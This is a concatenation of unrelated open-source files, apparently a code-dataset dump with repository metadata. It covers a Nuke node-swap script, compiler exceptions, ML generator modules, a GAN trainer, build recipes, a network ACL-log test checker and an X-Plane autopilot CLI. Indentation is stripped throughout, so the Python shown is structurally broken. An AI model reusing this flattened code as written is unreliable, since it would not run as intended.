set_pos(read, pos[0], pos[1] + grid[1]*4)
# match colorspace
colorspace = node['colorspace'].value()
if '(' in colorspace and ')' in colorspace:
# parse out role
colorspace = colorspace.split('(')[1].split(')')[0]
read['colorspace'].setValue(colorspace)
read['raw'].setValue(node['raw'].getValue())
# Enhanced swap functionality.
def swap_node():
nodes = nuke.selectedNodes()
for node in nodes:
if node.inputs() > 1:
nukescripts.swapAB(node)
if node.Class() == 'OCIOColorSpace':
in_colorspace = node['in_colorspace'].value()
out_colorspace = node['out_colorspace'].value()
node['out_colorspace'].setValue(in_colorspace)
node['in_colorspace'].setValue(out_colorspace)
elif 'direction' in node.knobs():
direction = node['direction']
if direction.getValue() == 1:
direction.setValue(0)
else:
direction.setValue(1)
elif 'invert' in node.knobs():
invert = node['invert']
if invert.getValue() == 1:
invert.setValue(0)
else:
invert.setValue(1)
elif 'reverse' in node.knobs():
reverse = node['reverse']
if reverse.getValue() == 1:
reverse.setValue(0)
else:
reverse.setValue(1)
elif node.Class() == 'Colorspace':
colorspace_in = node['colorspace_in'].value()
colorspace_out = node['colorspace_out'].value()
node['colorspace_out'].setValue(colorspace_in)
node['colorspace_in'].setValue(colorspace_out)
def swap_view():
views = nuke.views()
if len(views) == 2:
nuke.activeViewer().setView(views[1]) if nuke.activeViewer().view() == views[0] else nuke.activeViewer().setView(views[0])
| 2 | 2 |
fython/config/exception.py | nicolasessisbreton/fython | 41 | 12766440 | # base
class FyException(Exception):
def __init__(s, message):
s.message = '\n;;;;;\n'
s.message += s.__class__.__name__.replace('_', ' ')
s.message += '\n'
s.message += str(message)
def __str__(s):
return s.message
# exception
class a_function_cannot_be_dotted(FyException):
pass
class cannot_indent_on_first_line(FyException):
pass
class cannot_find_attribute_in_class(FyException):
pass
class cannot_find_attribute_setter_in_class(FyException):
pass
class cannot_find_targetted_ast(FyException):
pass
class cannot_mix_args_and_kwargs(FyException):
pass
class cannot_overwrite_spec(FyException):
pass
class cannot_resolve_modifier(FyException):
pass
class cannot_set_reference_with_a_property_setter(FyException):
pass
class cannot_find_class_definition_in_module(FyException):
pass
class compilation_error(FyException):
pass
class else_without_if_elif_where_or_elwhere(FyException):
pass
class error_in_interpolant(FyException):
pass
class fortran_file_not_found(FyException):
pass
class guid_override_error(FyException):
pass
class indentation_increased_by_more_than_one_level(FyException):
pass
class indentation_without_colon(FyException):
pass
class inconsistent_mro(FyException):
pass
class intrinsic_type_cannot_be_dotted(FyException):
pass
class invalid_url(FyException):
pass
class left_element_in_aliased_import_is_not_an_url(FyException):
pass
class interpretation_error(FyException):
pass
class lexical_interpolation_is_only_on_routine_or_class(FyException):
pass
class linking_error(FyException):
pass
class mark_newlinex_lexing_error(FyException):
pass
class mixed_indentation(FyException):
pass
class nb_of_arguments_mismatch(FyException):
pass
class no_element_specified_in_slice_import(FyException):
pass
class no_fortran_compiler_found(FyException):
pass
class only_aliased_namespace_star_or_slice_import_are_allowed(FyException):
pass
class only_attribute_or_method_can_be_inherited(FyException):
pass
class only_star_import_allowed_for_shared_library(FyException):
pass
class only_star_or_slice_import_allowed_for_fortran(FyException):
pass
class python_import_error(FyException):
pass
class space_tab_mixed(FyException):
pass
class syntax_error(FyException):
pass
class unbalanced_parenthesis(FyException):
pass
class fml_error(FyException):
pass
class module_not_found(FyException):
pass
class name_not_found_in_fython_module(FyException):
pass
class package_not_found(FyException):
pass
class resolution_error(FyException):
pass
class string_format_error(FyException):
pass
class unknown_identifier(FyException):
pass
class unknown_print_mode(FyException):
pass
| 2.53125 | 3 |
Unity Shader/scripts/completions.py | xdegtyarev/SublimeConfig | 0 | 12766441 | <filename>Unity Shader/scripts/completions.py<gh_stars>0
import re
import os
class Record(object):
def __init__(self, trigger = "", content = "", shortTrigger = ""):
self.trigger = trigger
self.content = content
self.shortTrigger = shortTrigger
def readFile(path):
f = open(path, 'r')
buf = f.read()
f.close()
records = {}
recordsIter = re.finditer(r'"trigger":\s"(.*)",\s"contents":\s"(.*)"', buf)
for i in recordsIter:
trigger = i.group(1)
content = i.group(2)
# print(trigger)
regMatch = re.search(r"^(\w+)(\\t.*)?$", trigger)
if regMatch:
shortTrigger = regMatch.group(1)
else:
shortTrigger = trigger
r = Record(trigger, content, shortTrigger)
records[shortTrigger] = r
# print(r.trigger, r.content)
return records
def writeFile(records, path):
f = open(path, 'w')
f.write(r'''{
"scope": "source.shader",
"completions":
[
''')
recordList = list(records.items())
recordList.sort()
for k, v in recordList:
line = ' { "trigger": "%s", "contents": "%s"},\n' % (v.trigger, v.content)
f.write(line)
f.write(r''' ]
}
''')
f.close()
def Sub(a, b):
print("Before Sub, len(a) = %s len(b) = %s" % (len(a), len(b)))
for k,v in b.items():
if a.get(k):
a.pop(k)
# print("Del: ", k)
print("After Sub, len(a) = %s len(b) = %s" % (len(a), len(b)))
def Add(a, b):
print("Before Add, len(a) = %s len(b) = %s" % (len(a), len(b)))
for k,v in b.items():
if a.get(k):
pass
else:
a[k] = v
print("Add: ", k)
print("After Add, len(a) = %s len(b) = %s" % (len(a), len(b)))
cg = readFile(r"C:\Users\Administrator\AppData\Roaming\Sublime Text 3\Packages\UnityShader\cg.sublime-completions")
builtin = readFile(r"C:\Users\Administrator\AppData\Roaming\Sublime Text 3\Packages\UnityShader\builtin.sublime-completions")
globalComletions = readFile(r"C:\Users\Administrator\AppData\Roaming\Sublime Text 3\Packages\UnityShader\global.sublime-completions")
# Add(cg, builtin)
Sub(globalComletions, builtin)
# writeFile(globalComletions, r"C:\Users\Administrator\AppData\Roaming\Sublime Text 3\Packages\UnityShader\global.sublime-completions") | 2.5625 | 3 |
test/conftest.py | Thhhza/sqlalchemy | 1 | 12766442 | #!/usr/bin/env python
"""
pytest plugin script.
This script is an extension to py.test which
installs SQLAlchemy's testing plugin into the local environment.
"""
import sys
from os import path
for pth in ['../lib']:
sys.path.insert(0, path.join(path.dirname(path.abspath(__file__)), pth))
from sqlalchemy.testing.plugin.pytestplugin import *
| 1.71875 | 2 |
src/models/generator.py | RowitZou/RankAE | 23 | 12766443 | import torch
import torch.nn as nn
from models.neural import aeq
from models.neural import gumbel_softmax
class Generator(nn.Module):
def __init__(self, vocab_size, dec_hidden_size, pad_idx):
super(Generator, self).__init__()
self.linear = nn.Linear(dec_hidden_size, vocab_size)
self.softmax = nn.LogSoftmax(dim=-1)
self.pad_idx = pad_idx
def forward(self, x, use_gumbel_softmax=False):
output = self.linear(x)
output[:, self.pad_idx] = -float('inf')
if use_gumbel_softmax:
output = gumbel_softmax(output, log_mode=True, dim=-1)
else:
output = self.softmax(output)
return output
class CopyGenerator(nn.Module):
"""An implementation of pointer-generator networks
:cite:`DBLP:journals/corr/SeeLM17`.
These networks consider copying words
directly from the source sequence.
The copy generator is an extended version of the standard
generator that computes three values.
* :math:`p_{softmax}` the standard softmax over `tgt_dict`
* :math:`p(z)` the probability of copying a word from
the source
* :math:`p_{copy}` the probility of copying a particular word.
taken from the attention distribution directly.
The model returns a distribution over the extend dictionary,
computed as
:math:`p(w) = p(z=1) p_{copy}(w) + p(z=0) p_{softmax}(w)`
.. mermaid::
graph BT
A[input]
S[src_map]
B[softmax]
BB[switch]
C[attn]
D[copy]
O[output]
A --> B
A --> BB
S --> D
C --> D
D --> O
B --> O
BB --> O
Args:
input_size (int): size of input representation
output_size (int): size of output vocabulary
pad_idx (int)
"""
def __init__(self, output_size, input_size, pad_idx):
super(CopyGenerator, self).__init__()
self.linear = nn.Linear(input_size, output_size)
self.linear_copy = nn.Linear(input_size, 1)
self.softmax = nn.LogSoftmax(dim=-1)
self.pad_idx = pad_idx
def forward(self, hidden, attn, src_map, use_gumbel_softmax=False):
"""
Compute a distribution over the target dictionary
extended by the dynamic dictionary implied by copying
source words.
Args:
hidden (FloatTensor): hidden outputs ``(batch x tlen, input_size)``
attn (FloatTensor): attn for each ``(batch x tlen, input_size)``
src_map (FloatTensor):
A sparse indicator matrix mapping each source word to
its index in the "extended" vocab containing.
``(batch, src_len, extra_words)``
"""
# CHECKS
batch_by_tlen, _ = hidden.size()
batch_by_tlen_, slen = attn.size()
batch, slen_, cvocab = src_map.size()
aeq(batch_by_tlen, batch_by_tlen_)
aeq(slen, slen_)
# Original probabilities.
logits = self.linear(hidden)
logits[:, self.pad_idx] = -float('inf')
if use_gumbel_softmax:
prob = gumbel_softmax(logits, log_mode=False, dim=1)
else:
prob = torch.softmax(logits, 1)
# Probability of copying p(z=1) batch.
p_copy = torch.sigmoid(self.linear_copy(hidden))
# Probability of not copying: p_{word}(w) * (1 - p(z))
out_prob = torch.mul(prob, 1 - p_copy)
mul_attn = torch.mul(attn, p_copy)
copy_prob = torch.bmm(
mul_attn.view(batch, -1, slen),
src_map
)
copy_prob = copy_prob.contiguous().view(-1, cvocab)
return torch.cat([out_prob, copy_prob], 1)
def collapse_copy_scores(scores, batch, tgt_vocab, src_vocabs=None,
batch_dim=0, batch_offset=None, beam_size=1, segs_index=None):
"""
Given scores from an expanded dictionary
corresponeding to a batch, sums together copies,
with a dictionary word when it is ambiguous.
"""
offset = len(tgt_vocab)
if segs_index is None:
segs_index = torch.repeat_interleave(torch.arange(len(batch.ex_segs), dtype=torch.long),
torch.tensor(batch.ex_segs) * beam_size, dim=0)
for b in range(scores.size(batch_dim)):
blank = []
fill = []
if src_vocabs is None:
src_vocab = batch.src_ex_vocab[segs_index[b]]
else:
batch_id = batch_offset[b] if batch_offset is not None else b
index = batch.indices.data[batch_id]
src_vocab = src_vocabs[index]
for i in range(1, len(src_vocab)):
sw = src_vocab.itos[i]
ti = tgt_vocab[sw]
if ti != 0:
blank.append(offset + i)
fill.append(ti)
if blank:
blank = torch.tensor(blank, device=scores.device)
fill = torch.tensor(fill, device=scores.device)
score = scores[:, b] if batch_dim == 1 else scores[b]
score.index_add_(1, fill, score.index_select(1, blank))
score.index_fill_(1, blank, 0.)
return scores
| 3.078125 | 3 |
mre/helper/__init__.py | CherryKitten/mre | 0 | 12766444 | from .Range import Range
| 1.078125 | 1 |
notes/code/zillow/chart.py | akkiittiwari/msan692 | 0 | 12766445 | <reponame>akkiittiwari/msan692
# REGISTER: https://www.zillow.com/user/Register.htm
# API REGISTER: https://www.zillow.com/webservice/Registration.htm
# API DOC: http://www.zillow.com/howto/api/APIOverview.htm
# Run with args: yourzipid "190 7th St APT 4" "San Francisco, CA"
import sys
import untangle
import urllib2
import urllib
KEY = sys.argv[1] # your zillow api key/id as argument to script
# Find a house
SearchURL = "http://www.zillow.com/webservice/GetChart.htm?zws-id=%s&zpid=%s&unit-type=percent&width=500&height=250&chartDuration=10years"
URL = SearchURL % (KEY, '64969892')
response = urllib2.urlopen(URL)
xmldata = response.read()
print xmldata
xml = untangle.parse(xmldata)
code = xml.SearchResults_searchresults.message.code.cdata
if code=='0':
zpid = xml.SearchResults_searchresults.response.results.result.zpid.cdata
print zpid
else:
msg = xml.SearchResults_searchresults.message.text.cdata
print msg
| 2.953125 | 3 |
tests/check_acl_log.py | shenjiangc/ovn | 1 | 12766446 | <reponame>shenjiangc/ovn
#!/usr/bin/env python3
import argparse
import string
def strip(val):
"""Strip whitespace and quotation marks from val"""
return val.strip(f"{string.whitespace}\"'")
def parse_acl_log(line):
"""Convert an ACL log string into a dict"""
# First cut off the logging preamble.
# We're assuming the default log format.
acl_log = {}
_, _, details = line.rpartition("|")
# acl_details are things like the acl name, direction,
# verdict, and severity. packet_details are things like
# the protocol, addresses, and ports of the packet being
# logged.
acl_details, _, packet_details = details.partition(":")
for datum in acl_details.split(","):
name, _, value = datum.rpartition("=")
acl_log[strip(name)] = strip(value)
for datum in packet_details.split(","):
name, _, value = datum.rpartition("=")
if not name:
# The protocol is not preceded by "protocol="
# so we need to add it manually.
name = "protocol"
acl_log[strip(name)] = strip(value)
return acl_log
def get_acl_log(entry_num=1):
with open("ovn-controller.log", "r") as controller_log:
acl_logs = [line for line in controller_log if "acl_log" in line]
try:
return acl_logs[entry_num - 1]
except IndexError:
print(
f"There were not {entry_num} acl_log entries, \
only {len(acl_logs)}"
)
exit(1)
def add_parser_args(parser):
parser.add_argument("--entry-num", type=int, default=1)
# There are other possible things that can be in an ACL log,
# and if we need those in the future, we can add them later.
parser.add_argument("--name")
parser.add_argument("--verdict")
parser.add_argument("--severity")
parser.add_argument("--protocol")
parser.add_argument("--vlan_tci")
parser.add_argument("--dl_src")
parser.add_argument("--dl_dst")
parser.add_argument("--nw_src")
parser.add_argument("--nw_dst")
parser.add_argument("--nw_tos")
parser.add_argument("--nw_ecn")
parser.add_argument("--nw_ttl")
parser.add_argument("--icmp_type")
parser.add_argument("--icmp_code")
parser.add_argument("--tp_src")
parser.add_argument("--tp_dst")
parser.add_argument("--tcp_flags")
parser.add_argument("--ipv6_src")
parser.add_argument("--ipv6_dst")
def main():
parser = argparse.ArgumentParser()
add_parser_args(parser)
args = parser.parse_args()
acl_log = get_acl_log(args.entry_num)
parsed_log = parse_acl_log(acl_log)
# Express command line arguments as a dict, omitting any arguments that
# were not provided by the user.
expected = {k: v for k, v in vars(args).items() if v is not None}
del expected["entry_num"]
for key, val in expected.items():
try:
if parsed_log[key] != val:
print(
f"Expected log {key}={val} but got {key}={parsed_log[key]} \
in:\n\t'{acl_log}"
)
exit(1)
except KeyError:
print(
f"Expected log {key}={val} but {key} does not exist \
in:\n\t'{acl_log}'"
)
exit(1)
if __name__ == "__main__":
main()
| 3.15625 | 3 |
antlir/bzl/image/feature/symlink.bzl | facebookincubator/fs_image | 9 | 12766447 | <gh_stars>1-10
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
load("//antlir/bzl:shape.bzl", "shape")
load("//antlir/bzl:target_helpers.bzl", "antlir_dep")
load("//antlir/bzl:target_tagger.bzl", "new_target_tagger", "target_tagger_to_feature")
load(":symlink.shape.bzl", "symlink_t")
def _build_symlink_feature(link_target, link_name, symlinks_to_arg):
symlink_spec = shape.new(
symlink_t,
dest = link_name,
source = link_target,
)
return target_tagger_to_feature(
new_target_tagger(),
items = struct(**{symlinks_to_arg: [symlink_spec]}),
# The `fake_macro_library` docblock explains this self-dependency
extra_deps = [antlir_dep("bzl/image/feature:symlink")],
)
def feature_ensure_dir_symlink(link_target, link_name):
"""
The operation follows rsync convention for a destination (`link_name`):
`ends/in/slash/` means "write into this directory", `does/not/end/with/slash`
means "write with the specified filename":
- `feature.ensure_dir_symlink("/d", "/e/")` symlinks directory `/d` to `/e/d`
- `feature.ensure_dir_symlink("/a", "/b/c")` symlinks directory `/a` to `/b/c`
Both arguments are mandatory:
- `link_target` is the image-absolute source file/dir of the symlink.
This file must exist as we do not support dangling symlinks.
IMPORTANT: The emitted symlink will be **relative** by default, enabling
easier inspection if images via `buck-image-out`. If this is a problem
for you, we can add an `absolute` boolean kwarg.
- `link_name` is an image-absolute path. A trailing / is significant.
A `link_name` that does NOT end in / is a full path in the new image,
ending with a filename for the new symlink.
As with `image.clone`, a traling / means that `link_name` must be a
pre-existing directory in the image (e.g. created via
`image.ensure_dirs_exist`), and the actual link will be placed at
`link_name/(basename of link_target)`.
This item is indempotent: it is a no-op if a symlink already exists that
matches the spec.
"""
return _build_symlink_feature(link_target, link_name, "symlinks_to_dirs")
def feature_ensure_file_symlink(link_target, link_name):
"""
The operation follows rsync convention for a destination (`link_name`):
`ends/in/slash/` means "write into this directory", `does/not/end/with/slash`
means "write with the specified filename":
- `feature.ensure_file_symlink("/d", "/e/")` symlinks file `/d` to `/e/d`
- `feature.ensure_file_symlink("/a", "/b/c")` symlinks file `/a` to `/b/c`
Both arguments are mandatory:
- `link_target` is the image-absolute source file/dir of the symlink.
This file must exist as we do not support dangling symlinks.
IMPORTANT: The emitted symlink will be **relative** by default, enabling
easier inspection if images via `buck-image-out`. If this is a problem
for you, we can add an `absolute` boolean kwarg.
- `link_name` is an image-absolute path. A trailing / is significant.
A `link_name` that does NOT end in / is a full path in the new image,
ending with a filename for the new symlink.
As with `image.clone`, a traling / means that `link_name` must be a
pre-existing directory in the image (e.g. created via
`image.ensure_dirs_exist`), and the actual link will be placed at
`link_name/(basename of link_target)`.
This item is indempotent: it is a no-op if a symlink already exists that
matches the spec.
"""
return _build_symlink_feature(link_target, link_name, "symlinks_to_files")
| 2.03125 | 2 |
conanfile.py | memsharded/conan-spdlog | 6 | 12766448 | <reponame>memsharded/conan-spdlog
from conans import ConanFile
class spdlogConan(ConanFile):
name = "spdlog"
version = "0.13.0"
license = "MIT"
url = "https://github.com/memsharded/conan-spdlog"
options = {"fmt_external": [True, False]}
default_options = "fmt_external=False"
def requirements(self):
if self.options.fmt_external:
self.requires("fmt/3.0.1@memsharded/stable")
def source(self):
self.run("git clone https://github.com/gabime/spdlog.git")
self.run("cd spdlog && git checkout v%s" % self.version)
def package(self):
self.copy("*.h", dst="include", src="spdlog/include")
self.copy("*ostream.cc", dst="include", src="spdlog/include")
if not self.options.fmt_external:
self.copy("*format.cc", dst="include", src="spdlog/include")
def package_info(self):
if self.options.fmt_external:
self.cpp_info.defines.append("SPDLOG_FMT_EXTERNAL")
| 2.21875 | 2 |
src/cdctrain.py | PoCInnovation/VanGaugan | 2 | 12766449 | import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
import torchvision.datasets as dset
import torchvision.transforms as transforms
import torchvision.utils as utils
import matplotlib.pyplot as plt
import numpy as np
from torch.utils.tensorboard import SummaryWriter
from celeba_dataset import CelebaDataset
from pathlib import Path
from generator import Generator, getImage, CGenerator, cDCGenerator
from discriminator import Discriminator, CDiscriminator, cDCDiscriminator
from sys import argv, exit, stderr
from datetime import date
BS = 128 # Batch size
LR = 0.0002 # Learning Rate
IMG_SIZE = 64
N_CLASSES = 10
def loadMnistDataset():
return torch.utils.data.DataLoader( # Load MNIST DATASET
dset.MNIST(
'./dataset',
train=True,
download=True,
transform=transforms.Compose([
transforms.Resize(IMG_SIZE),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
])
),
batch_size=BS, shuffle=True
)
class CDCTrainer():
def __init__(self, ngpu):
print(torch.cuda.is_available())
device_type = "cuda:0" if torch.cuda.is_available() and ngpu >= 0 else "cpu"
self.device = torch.device(device_type)
self.GNet = cDCGenerator(ngpu).to(self.device)
self.DNet = cDCDiscriminator(ngpu).to(self.device)
print(self.device.type)
if self.device.type == "cuda" and ngpu > 1:
device_ids = list(range(ngpu))
self.GNet = nn.DataParallel(self.GNet, device_ids=device_ids)
self.DNet = nn.DataParallel(self.DNet, device_ids=device_ids)
print("GPU OK")
self.GNet.init_weight()
self.DNet.init_weight()
self.GOpti = optim.Adam(self.GNet.parameters(), lr=LR)
self.DOpti = optim.Adam(self.DNet.parameters(), lr=LR)
# Adam optimizer -> Stochastic Optimization
self.loss_fun = torch.nn.BCELoss() # Error calculation concerning GAN
self.writter = SummaryWriter(log_dir='log/loss', comment='Training loss') # logger pour tensorboard
self.fill = torch.zeros(10, 10, IMG_SIZE, IMG_SIZE, device=self.device)
for i in range(0, N_CLASSES):
self.fill[i, i , :, :] = 1
def __del__(self):
self.writter.close()
# Train generator model
def trainGNet(self):
self.GOpti.zero_grad()
fake_labels = gen_fake_labels(BS, self.device)
fake_labels_fill = self.fill[fake_labels]
fake_imgs = self.GNet(self.createNoise(fake_labels.size(0)), fake_labels)
validity = self.DNet(fake_imgs, fake_labels_fill)
g_loss = self.loss_fun(validity, torch.ones(BS, 1, 1, 1, device=self.device))
g_loss.backward()
self.GOpti.step()
return g_loss
# Train discriminator model
def trainDNet(self, fake_data, fake_labels, real_data , labels):
self.DOpti.zero_grad()
labels_fill = self.fill[labels]
fake_labels_fill = self.fill[fake_labels]
# Train with real pictures
real_validity = self.DNet(real_data, labels_fill)
real_loss = self.loss_fun(real_validity, torch.ones(real_data.shape[0], 1, 1, 1, device=self.device))
# Train with generated pictures
fake_validity = self.DNet(fake_data, fake_labels_fill)
fake_loss = self.loss_fun(fake_validity, torch.zeros(BS, 1, 1, 1, device=self.device))
d_loss = real_loss + fake_loss
d_loss.backward()
self.DOpti.step()
return {
"error": d_loss,
"realRes": real_validity,
"fakeRes": fake_validity
}
def __call__(self, epoch, loader):
for e in range(epoch):
i = 0
for i, (batch, labels) in enumerate(loader):
print("iteration = ", i)
# Transform batch in order to make it use the right device and get his real size
real_imgs = batch.to(self.device)
s = real_imgs.size(0)
# Prepare generated pictures and lables sets
fake_labels = gen_fake_labels(BS, self.device)
fake_imgs = self.GNet(self.createNoise(BS), fake_labels).detach()
DResult = self.trainDNet(fake_imgs, fake_labels, real_imgs, labels.cuda() if torch.cuda.is_available() else labels)
for j in range(0, 2) :
GError = self.trainGNet()
self.log(e, DResult['error'], GError)
print(f"Epoch {e + 1} done", file=stderr)
self.save("./models/default/" + str(date.today()) + "_g_" + str(e + 1),
"./models/default/" + str(date.today()) + "_d_" + str(e + 1))
def log(self, epoch, DLoss, GLoss):
print(f"epoch: {epoch}")
print(f"Discriminator Loss : {DLoss}")
print(f"Generator Loss : {GLoss}")
print("==========================================")
self.writter.add_scalar('Loss/Generator', GLoss, epoch)
self.writter.add_scalar('Loss/Discriminator', DLoss, epoch)
self.writter.add_scalars('Loss/Generator+Discriminator', {
'Generator': GLoss,
'Discriminator': DLoss
}, epoch)
def save(self, Gpath, Dpath):
torch.save(self.GNet.state_dict(), Gpath)
torch.save(self.DNet.state_dict(), Dpath)
# Return a normalized vector of shape (1, BS)used as input generator
def createNoise(self, n):
return torch.randn(n, 100, 1, 1, device=self.device)
def preprocess(self, rawData, nout):
return rawData.view(rawData.size(0), nout)
def reveal(self, data, i, j):
return data.view(data.size(0), 1, i, j)
def gen_fake_labels(n, device='cpu') :
fake_labels = torch.randint(0, 10, (n,) , device=device)
return (fake_labels)
def loadModel(path, Model):
model = Model(0)
try:
model.load_state_dict(torch.load(path, map_location='cpu'))
except Exception as error:
exit(f"Error : {path} : {error}")
return model
def load_and_show(path, label):
GNet = loadModel(path, CGenerator)
rand_tensor = torch.randn(1, 100, 1, 1)
res = GNet(rand_tensor, label).squeeze()
img = getImage(res)
plt.imshow(img)
plt.show()
def make_grid(modelPath):
Gnet = loadModel(modelPath, CGenerator)
rand_labels = gen_fake_labels(64)
rand_tensor = torch.randn(64, 100, 1, 1)
output = Gnet(rand_tensor, rand_labels).squeeze()
plt.figure(figsize=(8, 8))
plt.axis("off")
plt.title("Generated images")
grid = utils.make_grid(output, padding=2, normalize=True)
image = ((grid.permute(1, 2, 0).detach().numpy()))
plt.imshow(image)
plt.show()
| 2.40625 | 2 |
xplane/cli/autopilot.py | tomleese/snakes-on-a-plane | 0 | 12766450 | import asyncio
import xplane.autopilot
import xplane.io
class MyProtocol(xplane.io.Protocol, xplane.autopilot.TakeoffMixin):
def __init__(self, remote_addr):
super().__init__(remote_addr)
def got_data_packet(self, packet, address):
self.take_off_got_data_packet(packet, address)
def mainloop(local_addr, remote_addr, action):
loop = asyncio.get_event_loop()
connect = loop.create_datagram_endpoint(lambda: MyProtocol(remote_addr),
local_addr=local_addr)
transport, protocol = loop.run_until_complete(connect)
loop.call_soon(lambda: getattr(protocol, action)())
loop.run_forever()
transport.close()
loop.close()
def main():
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('send_host', type=str)
parser.add_argument('--send-port', '-p', type=int, default=49000)
parser.add_argument('--listen-host', '-b', type=str, default='0.0.0.0')
parser.add_argument('--listen-port', '-P', type=int, default=49000)
parser.add_argument('action', type=str, choices=['takeoff'])
args = parser.parse_args()
local_addr = (args.listen_host, args.listen_port)
remote_addr = (args.send_host, args.send_port)
mainloop(local_addr, remote_addr, args.action)
| 2.5625 | 3 |